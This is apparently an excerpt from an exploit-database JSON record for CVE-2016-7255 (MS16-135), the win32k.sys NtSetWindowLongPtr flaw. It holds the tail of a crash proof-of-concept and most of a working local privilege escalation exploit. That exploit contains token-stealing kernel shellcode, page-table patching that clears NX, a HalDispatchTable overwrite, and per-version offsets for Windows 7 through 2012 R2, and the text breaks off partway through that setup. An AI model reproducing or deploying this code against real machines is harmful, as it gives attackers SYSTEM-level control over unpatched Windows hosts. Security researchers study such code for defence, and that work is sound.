KEYEVENTF_KEYUP; \n \nSendInput(1 , &stInput , sizeof(stInput) ); \n \n} while (FALSE); \n \nreturn 0; \n} \n \nint _sim_alt_shift_esc() \n{ \nint i = 0; \n \ndo \n{ \n_sim_key_down( VK_MENU ); \n_sim_key_down( VK_SHIFT ); \n \n \n_sim_key_down( VK_ESCAPE); \n_sim_key_up( VK_ESCAPE); \n \n_sim_key_down( VK_ESCAPE); \n_sim_key_up( VK_ESCAPE); \n \n_sim_key_up( VK_MENU ); \n_sim_key_up( VK_SHIFT ); \n \n \n} while (FALSE); \n \nreturn 0; \n} \n \n \n \nint _sim_alt_shift_tab(int nCount) \n{ \nint i = 0; \nHWND hWnd = NULL; \n \n \nint nFinalRet = -1; \n \ndo \n{ \n_sim_key_down( VK_MENU ); \n_sim_key_down( VK_SHIFT ); \n \n \nfor ( i = 0; i < nCount ; i++) \n{ \n_sim_key_down( VK_TAB); \n_sim_key_up( VK_TAB); \n \nSleep(1000); \n \n} \n \n \n_sim_key_up( VK_MENU ); \n_sim_key_up( VK_SHIFT ); \n} while (FALSE); \n \nreturn nFinalRet; \n} \n \n \n \nint or_address_value_4(__in void* pAddress) \n{ \nWNDCLASSEXW stWC = {0}; \n \nHWND hWndParent = NULL; \nHWND hWndChild = NULL; \n \nWCHAR* pszClassName 
= L\"cve-2016-7255\"; \nWCHAR* pszTitleName = L\"cve-2016-7255\"; \n \nvoid* pId = NULL; \nMSG stMsg = {0}; \n \ndo \n{ \n \nstWC.cbSize = sizeof(stWC); \nstWC.lpfnWndProc = DefWindowProcW; \nstWC.lpszClassName = pszClassName; \n \nif ( 0 == RegisterClassExW(&stWC) ) \n{ \nbreak; \n} \n \nhWndParent = CreateWindowExW( \n0, \npszClassName, \nNULL, \nWS_OVERLAPPEDWINDOW|WS_VISIBLE, \n0, \n0, \n360, \n360, \nNULL, \nNULL, \nGetModuleHandleW(NULL), \nNULL \n); \n \nif (NULL == hWndParent) \n{ \nbreak; \n} \n \nhWndChild = CreateWindowExW( \n0, \npszClassName, \npszTitleName, \nWS_OVERLAPPEDWINDOW|WS_VISIBLE|WS_CHILD, \n0, \n0, \n160, \n160, \nhWndParent, \nNULL, \nGetModuleHandleW(NULL), \nNULL \n); \n \nif (NULL == hWndChild) \n{ \nbreak; \n} \n \n#ifdef _WIN64 \npId = ( (UCHAR*)pAddress - 0x28 ); \n#else \npId = ( (UCHAR*)pAddress - 0x14); \n#endif // #ifdef _WIN64 \n \nSetWindowLongPtr(hWndChild , GWLP_ID , (LONG_PTR)pId ); \n \nDbgPrint(\"hWndChild = 0x%p\\n\" , hWndChild); \nDebugBreak(); \n \nShowWindow(hWndParent , SW_SHOWNORMAL); \n \nSetParent(hWndChild , GetDesktopWindow() ); \n \nSetForegroundWindow(hWndChild); \n \n_sim_alt_shift_tab(4); \n \nSwitchToThisWindow(hWndChild , TRUE); \n \n_sim_alt_shift_esc(); \n \n \nwhile( GetMessage(&stMsg , NULL , 0 , 0) ) \n{ \nTranslateMessage(&stMsg); \nDispatchMessage(&stMsg); \n} \n \n \n} while (FALSE); \n \nif ( NULL != hWndParent ) \n{ \nDestroyWindow(hWndParent); \nhWndParent = NULL; \n} \n \nif ( NULL != hWndChild ) \n{ \nDestroyWindow(hWndChild); \nhWndChild = NULL; \n} \n \nUnregisterClassW(pszClassName , GetModuleHandleW(NULL) ); \n \nreturn 0; \n} \n \nint __cdecl wmain(int nArgc, WCHAR** Argv) \n{ \ndo \n{ \nor_address_value_4( (void*)0xFFFFFFFF ); \n} while (FALSE); \n \nreturn 0; \n} \n \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/139701/ms16135-dos.txt"}], "exploitpack": [{"lastseen": 
"2020-04-01T19:04:33", "description": "\nMicrosoft Windows Kernel - win32k.sys NtSetWindowLongPtr Local Privilege Escalation (MS16-135) (2)", "edition": 1, "published": "2017-01-08T00:00:00", "title": "Microsoft Windows Kernel - win32k.sys NtSetWindowLongPtr Local Privilege Escalation (MS16-135) (2)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-7255"], "modified": "2017-01-08T00:00:00", "id": "EXPLOITPACK:3A596E79FE66F4077B2897D4B2D5D53B", "href": "", "sourceData": "/*\nSource: https://ricklarabee.blogspot.com/2017/01/virtual-memory-page-tables-and-one-bit.html\n\nBinary: https://github.com/rlarabee/exploits/raw/8b9eb646516d7f022a010f28018209f331c28975/cve-2016-7255/compiled/cve-2016-7255.exe\nMirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41015.exe\n*/\n\n// ricklarabee.blogspot.com\n\n//This program is free software; you can redistribute it and/or\n//modify it under the terms of the GNU General Public License\n//as published by the Free Software Foundation.\n\n//This program is distributed in the hope that it will be useful,\n//but WITHOUT ANY WARRANTY; without even the implied warranty of\n//MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.See the\n//GNU General Public License for more details.\n\n//You should have received a copy of the GNU General Public License\n//along with this program; if not, write to the Free Software\n//Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n\n// Credits: enrique.nissim@IOActive.com: https://github.com/IOActive/I-know-where-your-page-lives/tree/master/code/CVE-2016-7255\n// PoC from https://github.com/tinysec/public/tree/master/CVE-2016-7255\n\n#include <windows.h>\n#include <wchar.h>\n#include <stdlib.h>\n#include <stdio.h>\n\n#pragma comment(lib,\"ntdll.lib\")\n#pragma comment(lib,\"user32.lib\")\n#pragma comment(lib, \"advapi32\")\n\nUINT64 PML4_BASE;\nUINT PML4_SELF_REF_INDEX;\nUINT64 PML4_SELF_REF = 
0xFFFFF6FB7DBEDF68;\n\n#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)\n#define STATUS_UNSUCCESSFUL ((NTSTATUS)0xC0000001L)\n#define GET_INDEX(va) ( ((va >> 39) & 0x1ff )) \n\n////////////////////////////////////////////////////////\n// Define Data Types\n////////////////////////////////////////////////////////\ntypedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {\n PVOID Unknown1;\n PVOID Unknown2;\n PVOID Base;\n ULONG Size;\n ULONG Flags;\n USHORT Index;\n USHORT NameLength;\n USHORT LoadCount;\n USHORT PathLength;\n CHAR ImageName[256];\n} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;\n\ntypedef struct _SYSTEM_MODULE_INFORMATION {\n ULONG Count;\n SYSTEM_MODULE_INFORMATION_ENTRY Module[1];\n} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;\n\ntypedef enum _SYSTEM_INFORMATION_CLASS { \n SystemModuleInformation = 11,\n SystemHandleInformation = 16\n} SYSTEM_INFORMATION_CLASS;\n\ntypedef NTSTATUS (WINAPI *NtQuerySystemInformation_t)(IN SYSTEM_INFORMATION_CLASS SystemInformationClass,\n OUT PVOID SystemInformation,\n IN ULONG SystemInformationLength,\n OUT PULONG ReturnLength);\n\ntypedef NTSTATUS (WINAPI *NtQueryIntervalProfile_t)(IN ULONG ProfileSource,\n\t\t\t\t\t\t\t\t\t\t\t\t\tOUT PULONG Interval);\n\nNtQuerySystemInformation_t NtQuerySystemInformation;\nNtQueryIntervalProfile_t NtQueryIntervalProfile;\n \nchar shellcode[] = {\n\t//0xcc,\n\t0xfa, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// CLI\n\t0x9c, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// PUSHFQ\n\t0x48, 0xb8, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, \t// MOV RAX, Original Pointer\n\t0x50, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// PUSH RAX\n\t0x51, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// PUSH RCX\n\t0x48, 0xb9, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, \t// MOV RCX, [OverwriteAddr+OverwriteOffset]\n\t0x48, 0x89, 0x01, \t\t\t\t\t\t\t\t\t\t\t\t// MOV QWORD PTR [RCX], RAX\n\t0xb9, 0x90, 0x90, 0x90, 0x90, \t\t\t\t\t\t\t\t\t// MOV ECX, PID\n\t0x53, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// PUSH RBX\n\n\t0x65, 0x48, 
0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, \t\t\t// MOV RAX,QWORD PTR gs:0x188\n\t0x48, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00,\t\t\t\t\t\t// MOV RAX,QWORD PTR [RAX+0xb8] EPROCESS\n\t0x48, 0x8d, 0x80, 0x90, 0x90, 0x00, 0x00,\t\t\t\t\t\t// LEA RAX,[RAX+0xActiveProcessLinkOffset] \n\t//<tag>\n\t0x48, 0x8b, 0x00,\t\t\t\t\t\t\t\t\t\t\t\t// MOV RAX,QWORD PTR [RAX]\n\t0x48, 0x8b, 0x58, 0xf8,\t\t\t\t\t\t\t\t\t\t\t// MOV RBX,QWORD PTR [RAX-0x8] // UniqueProcessID\n\t0x48, 0x83, 0xfb, 0x04,\t\t\t\t\t\t\t\t\t\t\t// CMP RBX,0x4\n\t0x75, 0xf3,\t\t\t\t\t\t\t\t\t\t\t\t\t\t// JNE <tag>\n\t0x48, 0x8b, 0x98, 0x90, 0x90, 0x90, 0x90,\t\t\t\t\t\t// MOV RBX, QWORD PTR [RAX+0x60] // GET TOKEN of SYSTEM\n\n\t0x53, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// PUSH RBX\n\t//<tag2>\n\t0x48, 0x8b, 0x00,\t\t\t\t\t\t\t\t\t\t\t\t// MOV RAX,QWORD PTR [RAX]\n\t0x48, 0x8b, 0x58, 0xf8,\t\t\t\t\t\t\t\t\t\t\t// MOV RBX,QWORD PTR [RAX-0x8] // UniqueProcessID\n\t0x39, 0xcb,\t\t\t\t\t\t\t\t\t\t\t\t\t\t// CMP EBX, ECX // our PID\n\t0x75, 0xf5,\t\t\t\t\t\t\t\t\t\t\t\t\t\t// JNE <tag2>\n\t0x5b, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// POP RBX\n\t0x48, 0x89, 0x98, 0x90, 0x90, 0x90, 0x90,\t\t\t\t\t\t// MOV QWORD PTR[RAX + 0x60], RBX\n\n\t0x5b, // POP RBX\n\t0x59, // POP RCX\n\t0x58, // POP RAX\n\t0x9d, // POPFQ\n\n\t0xfb, // STI\n\t0xff, 0xe0 // JMP RAX\n};\n\nULONG __cdecl DbgPrint(__in char* Format, ...)\n{\n\tCHAR* pszDbgBuff = NULL;\n\tva_list VaList = NULL;\n\tULONG ulRet = 0;\n\n\tdo\n\t{\n\t\tpszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0, 1024 * sizeof(CHAR));\n\t\tif (NULL == pszDbgBuff)\n\t\t{\n\t\t\tbreak;\n\t\t}\n\t\tRtlZeroMemory(pszDbgBuff, 1024 * sizeof(CHAR));\n\n\t\tva_start(VaList, Format);\n\n\t\t_vsnprintf((CHAR*)pszDbgBuff, 1024 - 1, Format, VaList);\n\n\n\t\tOutputDebugStringA(pszDbgBuff);\n\n\t\tva_end(VaList);\n\n\t} while (FALSE);\n\n\tif (NULL != pszDbgBuff)\n\t{\n\t\tHeapFree(GetProcessHeap(), 0, pszDbgBuff);\n\t\tpszDbgBuff = NULL;\n\t}\n\n\treturn ulRet;\n}\n\n\nint _sim_key_down(WORD 
wKey)\n{\n\tINPUT stInput = { 0 };\n\n\tdo\n\t{\n\t\tstInput.type = INPUT_KEYBOARD;\n\t\tstInput.ki.wVk = wKey;\n\t\tstInput.ki.dwFlags = 0;\n\n\t\tSendInput(1, &stInput, sizeof(stInput));\n\n\t} while (FALSE);\n\n\treturn 0;\n}\n\nint _sim_key_up(WORD wKey)\n{\n\tINPUT stInput = { 0 };\n\n\tdo\n\t{\n\t\tstInput.type = INPUT_KEYBOARD;\n\t\tstInput.ki.wVk = wKey;\n\t\tstInput.ki.dwFlags = KEYEVENTF_KEYUP;\n\n\t\tSendInput(1, &stInput, sizeof(stInput));\n\n\t} while (FALSE);\n\n\treturn 0;\n}\n\nint _sim_alt_shift_esc()\n{\n\tint i = 0;\n\n\tdo\n\t{\n\t\t_sim_key_down(VK_MENU);\n\t\t_sim_key_down(VK_SHIFT);\n\n\n\t\t_sim_key_down(VK_ESCAPE);\n\t\t_sim_key_up(VK_ESCAPE);\n\n\t\t_sim_key_down(VK_ESCAPE);\n\t\t_sim_key_up(VK_ESCAPE);\n\n\t\t_sim_key_up(VK_MENU);\n\t\t_sim_key_up(VK_SHIFT);\n\n\n\t} while (FALSE);\n\n\treturn 0;\n}\n\n\n\nint _sim_alt_shift_tab(int nCount)\n{\n\tint i = 0;\n\tHWND hWnd = NULL;\n\n\n\tint nFinalRet = -1;\n\n\tdo\n\t{\n\t\t_sim_key_down(VK_MENU);\n\t\t_sim_key_down(VK_SHIFT);\n\n\n\t\tfor (i = 0; i < nCount; i++)\n\t\t{\n\t\t\t_sim_key_down(VK_TAB);\n\t\t\t_sim_key_up(VK_TAB);\n\n\t\t\tSleep(1000);\n\n\t\t}\n\n\n\t\t_sim_key_up(VK_MENU);\n\t\t_sim_key_up(VK_SHIFT);\n\t} while (FALSE);\n\n\treturn nFinalRet;\n}\n\nint _sim_alt_esc(int count)\n{\n\tint i = 0;\n\n\tfor (i = 0; i<count; i++)\n\t{\n\t\t_sim_key_down(VK_MENU);\n\t\t//_sim_key_down(VK_SHIFT);\n\n\n\t\t_sim_key_down(VK_ESCAPE);\n\t\t_sim_key_up(VK_ESCAPE);\n\n\t\t_sim_key_down(VK_ESCAPE);\n\t\t_sim_key_up(VK_ESCAPE);\n\n\t\t_sim_key_up(VK_MENU);\n\t\t//_sim_key_up(VK_SHIFT);\n\n\t}\n\n\treturn 0;\n}\n\n\nint or_address_value_4(__in void* pAddress)\n{\n\tWNDCLASSEXW stWC = { 0 };\n\n\tHWND hWndParent = NULL;\n\tHWND hWndChild = NULL;\n\n\tWCHAR* pszClassName = L\"cve-2016-7255\";\n\tWCHAR* pszTitleName = L\"cve-2016-7255\";\n\n\tvoid* pId = NULL;\n\tMSG stMsg = { 0 };\n\n\tUINT64 value = 0;\n\n\tdo\n\t{\n\n\t\tstWC.cbSize = sizeof(stWC);\n\t\tstWC.lpfnWndProc = 
DefWindowProcW;\n\t\tstWC.lpszClassName = pszClassName;\n\n\t\tif (0 == RegisterClassExW(&stWC))\n\t\t{\n\t\t\tbreak;\n\t\t}\n\n\t\thWndParent = CreateWindowExW(\n\t\t\t0,\n\t\t\tpszClassName,\n\t\t\tNULL,\n\t\t\tWS_OVERLAPPEDWINDOW | WS_VISIBLE,\n\t\t\t0,\n\t\t\t0,\n\t\t\t360,\n\t\t\t360,\n\t\t\tNULL,\n\t\t\tNULL,\n\t\t\tGetModuleHandleW(NULL),\n\t\t\tNULL\n\t\t);\n\n\t\tif (NULL == hWndParent)\n\t\t{\n\t\t\tbreak;\n\t\t}\n\n\t\thWndChild = CreateWindowExW(\n\t\t\t0,\n\t\t\tpszClassName,\n\t\t\tpszTitleName,\n\t\t\tWS_OVERLAPPEDWINDOW | WS_VISIBLE | WS_CHILD,\n\t\t\t0,\n\t\t\t0,\n\t\t\t160,\n\t\t\t160,\n\t\t\thWndParent,\n\t\t\tNULL,\n\t\t\tGetModuleHandleW(NULL),\n\t\t\tNULL\n\t\t);\n\n\t\tif (NULL == hWndChild)\n\t\t{\n\t\t\tbreak;\n\t\t}\n\n#ifdef _WIN64\n\t\tpId = ((UCHAR*)pAddress - 0x28);\n#else\n\t\tpId = ((UCHAR*)pAddress - 0x14);\n#endif // #ifdef _WIN64\n\n\t\tSetWindowLongPtr(hWndChild, GWLP_ID, (LONG_PTR)pId);\n\n\t\tDbgPrint(\"hWndChild = 0x%p\\n\", hWndChild);\n\n\t\tShowWindow(hWndParent, SW_SHOWNORMAL);\n\n\t\tSetParent(hWndChild, GetDesktopWindow());\n\n\t\tSetForegroundWindow(hWndChild);\n\n\t\t_sim_alt_shift_tab(4);\n\n\t\tSwitchToThisWindow(hWndChild, TRUE);\n\n\t\t_sim_alt_shift_esc();\n\n\t\twhile (GetMessage(&stMsg, NULL, 0, 0)) {\n\t\t\t\n\t\t\tSetFocus(hWndParent);\n\t\t\t_sim_alt_esc(20);\n\t\t\tSetFocus(hWndChild);\n\t\t\t_sim_alt_esc(20);\n\n\t\t\tTranslateMessage(&stMsg);\n\t\t\tDispatchMessage(&stMsg);\n\t\t\t\n\t\t\tif (value != 0) {\n\t\t\t\tbreak;\n\t\t\t}\n\t\t\t\n\n\t\t\t__try {\n\t\t\t\tvalue = *(UINT64 *)PML4_SELF_REF;\n\t\t\t\tif ((value & 0x67) == 0x67) {\n\t\t\t\t\tprintf(\"Value Self Ref = %llx\\n\", value);\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t}\n\t\t\t__except (EXCEPTION_EXECUTE_HANDLER) {\n\t\t\t\tcontinue;\n\t\t\t}\n\n\t\t}\n\n\n\t} while (FALSE);\n\n\tif (NULL != hWndParent)\n\t{\n\t\tDestroyWindow(hWndParent);\n\t\thWndParent = NULL;\n\t}\n\n\tif (NULL != hWndChild)\n\t{\n\t\tDestroyWindow(hWndChild);\n\t\thWndChild = 
NULL;\n\t}\n\n\tUnregisterClassW(pszClassName, GetModuleHandleW(NULL));\n\n\treturn 0;\n}\n\nUINT64 get_pxe_address(UINT64 address) {\n\tUINT entry = PML4_SELF_REF_INDEX;\n\tUINT64 result = address >> 9;\n\tUINT64 lower_boundary = ((UINT64)0xFFFF << 48) | ((UINT64)entry << 39);\n\tUINT64 upper_boundary = (((UINT64)0xFFFF << 48) | ((UINT64)entry << 39) + 0x8000000000 - 1) & 0xFFFFFFFFFFFFFFF8;\n\tresult = result | lower_boundary;\n\tresult = result & upper_boundary;\n\treturn result;\n}\n\nUINT64 look_free_entry_pml4(void) {\n\t// Looks for a free pml4e in the last 0x100 bytes of the PML4\n\tint offset = 0xF00;\n\tUINT64 pml4_search = PML4_BASE + offset;\n\twhile (offset < 0xFF8)\n\t{\n\t\tif ((*(PVOID *)pml4_search) == 0x0)\n\t\t{\n\t\t\t// This is a NULL (free) entry\n\t\t\tbreak;\n\t\t}\n\t\toffset += 8;\n\t\tpml4_search = PML4_BASE + offset;\n\t}\n\treturn pml4_search;\n}\n\nUINT64 calculate_spurious_pt_address(UINT64 spurious_offset) {\n\tUINT64 index = (spurious_offset & 0xFFF) / 8;\n\tUINT64 result = (\n\t\t((UINT64)0xFFFF << 48) |\n\t\t((UINT64)PML4_SELF_REF_INDEX << 39) |\n\t\t((UINT64)PML4_SELF_REF_INDEX << 30) |\n\t\t((UINT64)PML4_SELF_REF_INDEX << 21) |\n\t\t(index << 12)\n\t\t);\n\treturn result;\n}\n\n\n\nUINT64 create_spurious_pte_to_virtual_address(UINT64 virtual_address, BOOL patch_original) {\n\n\t/*\n\t1: kd> !pte ffffffff`ffd00000\n\tVA ffffffffffd00000\n\tPXE at FFFFF6FB7DBEDFF8 PPE at FFFFF6FB7DBFFFF8 PDE at FFFFF6FB7FFFFFF0 PTE at FFFFF6FFFFFFE800\n\tcontains 0000000000A1F063 contains 0000000000A20063 contains 0000000000A25063 contains 8000000000103963\n\tpfn a1f-- - DA--KWEV pfn a20-- - DA--KWEV pfn a25-- - DA--KWEV pfn 103 - G - DA--KW - V\n\t*/\t\n\n\tUINT64 pte = get_pxe_address(virtual_address);\n\tint pte_offset = pte & 0xFFF;\n\t//printf(\"PTE: %llx, %x\\n\", pte, pte_offset);\n\t\n\tUINT64 pde = get_pxe_address(pte);\n\tint pde_offset = pde & 0xFFF;\n\t//printf(\"PDE: %llx, %x\\n\", pde, pde_offset);\n\t\t\n\tUINT64 pdpte = 
get_pxe_address(pde);\n\tint pdpte_offset = pdpte & 0xFFF;\n\t//printf(\"PDPTE: %llx,%x\\n\", pdpte, pdpte_offset);\n\t\t\n\tUINT64 pml4e = get_pxe_address(pdpte);\n\tint pml4e_offset = pml4e & 0xFFF;\n\t//printf(\"PML4E: %llx\\n\", pml4e, pml4e_offset);\n\t\n\tUINT64 spurious_offset = look_free_entry_pml4();\n\tprintf(\"[+] Selected spurious PML4E: %llx\\n\", spurious_offset);\n\tUINT64 f_e_pml4 = spurious_offset;\n\tUINT64 spurious_pt = calculate_spurious_pt_address(spurious_offset);\n\tprintf(\"[+] Spurious PT: %llx\\n\", spurious_pt);\n\tprintf(\"--------------------------------------------------\\n\\n\");\n\t\n\t\n\t//Read the physical address of pml4e\t\n\tUINT64 pml4e_pfn = (UINT64)(*(PVOID *)pml4e);\n\tprintf(\"[+] Content pml4e %llx: %llx\\n\", pml4e, pml4e_pfn);\n\t// Change the PxE\n\tpml4e_pfn = pml4e_pfn | 0x67; // Set U/S\n\t\n\tprintf(\"[+] Patching the Spurious Offset (PML4e) %llx: %llx\\n\",f_e_pml4, pml4e_pfn);\n\t*((PVOID *)spurious_offset) = (PVOID)pml4e_pfn;\n\tSleep(0x1); // Sleep for TLB refresh;\n\t\n\t//Read the physical address of pdpte\n\tUINT64 pdpte_pfn = (UINT64) *(PVOID *)(spurious_pt + pdpte_offset);\n\tprintf(\"[+] Content pdpte %llx: %llx\\n\", pdpte, pdpte_pfn);\n\t// Change the PxE\n\tpdpte_pfn = pdpte_pfn | 0x67; // Set U/S\n\tprintf(\"[+] Patching the Spurious Offset (PDPTE) %llx: %llx\\n\", spurious_offset, pdpte_pfn);\n\t*((PVOID *)spurious_offset) = (PVOID)pdpte_pfn;\n\tSleep(0x1); // Sleep for TLB refresh;\n\t\n\t//Read the physical address of pde\n\tUINT64 pde_addr = spurious_pt + pde_offset;\n\tUINT64 pde_pfn = (UINT64) *(PVOID *)(spurious_pt + pde_offset);\n\tprintf(\"[+] Content pdpe %llx: %llx\\n\", pde, pde_pfn);\n\t// Change the PxE\n\tpde_pfn = pde_pfn | 0x67; // Set U/S\n\tprintf(\"[+] Patching the Spurious Offset (PDE) %llx: %llx\\n\", spurious_offset, pde_pfn);\n\t*((PVOID *)spurious_offset) = (PVOID)pde_pfn;\n\tSleep(0x1); // Sleep for TLB refresh;\n\t\n\t//Read the physical address of pte\n\tUINT64 pte_addr = 
spurious_pt + pte_offset;\n\tUINT64 pte_pfn = (UINT64) *(PVOID *)(spurious_pt + pte_offset);\n\tprintf(\"[+] Content pte %llx: %llx\\n\", pte, pte_pfn);\n\t// Change the PxE\n\tpte_pfn = pte_pfn | 0x67; // Set U/S\n pte_pfn = pte_pfn & 0x7fffffffffffffff; // Turn off NX \n\tif (patch_original) {\n\t\tprintf(\"*** Patching the original location to enable NX...\\n\");\n\t\t*(PVOID *)(spurious_pt + pte_offset) = (PVOID)pte_pfn;\n\t}\n \n\tprintf(\"[+] Patching the Spurious Offset (PTE) %llx: %llx\\n\", spurious_offset, pte_pfn);\n\t*((PVOID *)spurious_offset) = (PVOID)pte_pfn;\n\tSleep(0x1); // Sleep for TLB refresh;\n\tprintf(\"\\n\\n\");\n\treturn spurious_pt;\n}\n\nUINT64 get_OverwriteAddress_pointer(UINT64 target_address, int target_offset) {\n\tprintf(\"[*] Getting Overwrite pointer: %llx\\n\", target_address);\n\tUINT64 OverwriteAddress = create_spurious_pte_to_virtual_address(target_address, FALSE);\n\tOverwriteAddress += (target_address & 0xFFF);\n\tprintf(\"OverwriteAddress: %llx\\n\", OverwriteAddress);\n\treturn (UINT64) *((PVOID *)(((char *)OverwriteAddress) + target_offset));\n}\n\nvoid overwrite_TargetAddress(UINT64 hook_address, UINT64 target_address, int target_offset) {\n\tUINT64 OverwriteTarget = create_spurious_pte_to_virtual_address(target_address, FALSE);\n\tOverwriteTarget += (target_address & 0xFFF);\n\tUINT64 target = (UINT64)((char *)OverwriteTarget) + target_offset;\n\tprintf(\"Patch OverwriteTarget: %llx with %llx\\n\", target, hook_address);\n\t*(PVOID *)target = (PVOID)hook_address;\n}\n\n\nUINT64 store_shellcode_in_hal(void) {\n\t//// Finally store the shellcode on the HAL\n\n\tUINT64 hal_heap_addr = 0xFFFFFFFFFFD00000;\n\tUINT64 hal_heap = create_spurious_pte_to_virtual_address(hal_heap_addr, TRUE);\n\n\tprintf(\"HAL address: %llx\\n\", hal_heap);\n\t// 0xffffffffffd00d50 this is a good offset to store shellcode \n\t// 0xfff - 0xd50 = 0x2af space\n\n\tmemcpy(((char *)hal_heap) + 0xd50, shellcode, sizeof(shellcode));\n\treturn 
0xffffffffffd00d50;\n}\n\nUINT64 GetHalDispatchTable() {\n PCHAR KernelImage;\n SIZE_T ReturnLength;\n HMODULE hNtDll = NULL;\n UINT64 HalDispatchTable;\n HMODULE hKernelInUserMode = NULL;\n PVOID KernelBaseAddressInKernelMode;\n NTSTATUS NtStatus = STATUS_UNSUCCESSFUL;\n PSYSTEM_MODULE_INFORMATION pSystemModuleInformation;\n\n hNtDll = LoadLibrary(\"ntdll.dll\");\n\n if (!hNtDll) {\n printf(\"\\t\\t\\t[-] Failed To Load NtDll.dll: 0x%X\\n\", GetLastError());\n exit(EXIT_FAILURE);\n }\n\n NtQuerySystemInformation = (NtQuerySystemInformation_t)GetProcAddress(hNtDll, \"NtQuerySystemInformation\");\n\n if (!NtQuerySystemInformation) {\n printf(\"\\t\\t\\t[-] Failed Resolving NtQuerySystemInformation: 0x%X\\n\", GetLastError());\n exit(EXIT_FAILURE);\n }\n\n NtStatus = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &ReturnLength);\n\n // Allocate the Heap chunk\n pSystemModuleInformation = (PSYSTEM_MODULE_INFORMATION)HeapAlloc(GetProcessHeap(),\n HEAP_ZERO_MEMORY,\n ReturnLength);\n\n if (!pSystemModuleInformation) {\n printf(\"\\t\\t\\t[-] Memory Allocation Failed For SYSTEM_MODULE_INFORMATION: 0x%X\\n\", GetLastError());\n exit(EXIT_FAILURE);\n }\n NtStatus = NtQuerySystemInformation(SystemModuleInformation,\n pSystemModuleInformation,\n ReturnLength,\n &ReturnLength);\n\n if (NtStatus != STATUS_SUCCESS) {\n printf(\"\\t\\t\\t[-] Failed To Get SYSTEM_MODULE_INFORMATION: 0x%X\\n\", GetLastError());\n exit(EXIT_FAILURE);\n }\n\n KernelBaseAddressInKernelMode = pSystemModuleInformation->Module[0].Base;\n KernelImage = strrchr((PCHAR)(pSystemModuleInformation->Module[0].ImageName), '\\\\') + 1;\n\n printf(\"\\t\\t\\t[+] Loaded Kernel: %s\\n\", KernelImage);\n printf(\"\\t\\t\\t[+] Kernel Base Address: 0x%p\\n\", KernelBaseAddressInKernelMode);\n \n hKernelInUserMode = LoadLibraryA(KernelImage);\n\n if (!hKernelInUserMode) {\n printf(\"\\t\\t\\t[-] Failed To Load Kernel: 0x%X\\n\", GetLastError());\n exit(EXIT_FAILURE);\n }\n\n // This is still in user mode\n 
HalDispatchTable = (UINT64)GetProcAddress(hKernelInUserMode, \"HalDispatchTable\");\n\n if (!HalDispatchTable) {\n printf(\"\\t\\t\\t[-] Failed Resolving HalDispatchTable: 0x%X\\n\", GetLastError());\n exit(EXIT_FAILURE);\n }\n else {\n HalDispatchTable = (ULONGLONG)HalDispatchTable - (ULONGLONG)hKernelInUserMode;\n\n // Here we get the address of HapDispatchTable in Kernel mode\n HalDispatchTable = ((ULONGLONG)HalDispatchTable + (ULONGLONG)KernelBaseAddressInKernelMode);\n printf(\"\\t\\t\\t[+] HalDispatchTable: 0x%llx\\n\", HalDispatchTable);\n }\n\n HeapFree(GetProcessHeap(), 0, (LPVOID)pSystemModuleInformation);\n\n if (hNtDll) {\n FreeLibrary(hNtDll);\n }\n\n if (hKernelInUserMode) {\n FreeLibrary(hKernelInUserMode);\n }\n\n hNtDll = NULL;\n hKernelInUserMode = NULL;\n pSystemModuleInformation = NULL;\n\n return HalDispatchTable;\n}\n\nint __cdecl main(int argc, char** argv)\n{\n\tTCHAR pre_username[256];\n\tTCHAR post_username[256];\n\tDWORD size = 256;\n\tULONG Interval = 0;\n\tHMODULE hNtDll = NULL;\n\tUINT retval;\n UINT64 overwrite_address;\n int overwrite_offset;\n \n // define operating system version specific variables\n unsigned char sc_KPROCESS;\n unsigned int sc_TOKEN;\n unsigned int sc_APLINKS;\n\tint osversion;\n\n\tif (argc != 2) {\n\t\tprintf(\"Please enter an OS version\\n\");\n\t\tprintf(\"The following OS'es are supported:\\n\");\n\t\tprintf(\"\\t[*] 7 - Windows 7\\n\");\n\t\tprintf(\"\\t[*] 81 - Windows 8.1\\n\");\n\t\tprintf(\"\\t[*] 10 - Windows 10 prior to build release 14393 (Anniversary Update)\\n\");\n\t\tprintf(\"\\t[*] 12 - Windows 2012 R2\\n\");\n\t\tprintf(\"\\n\");\n\t\tprintf(\"\\t[*] For example: cve-2016-7255.exe 7 -- for Windows 7\\n\");\n\t\treturn -1;\n\t}\n\t\n\tosversion = _strtoui64(argv[1], NULL, 10);\n\t\n if(osversion == 7) \n {\n // the target machine's OS is Windows 7 SP1\n printf(\" [+] Windows 7 SP1\\n\");\n sc_KPROCESS = 0x70;\t\t\t// dt -r1 nt!_KTHREAD +0x050 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 
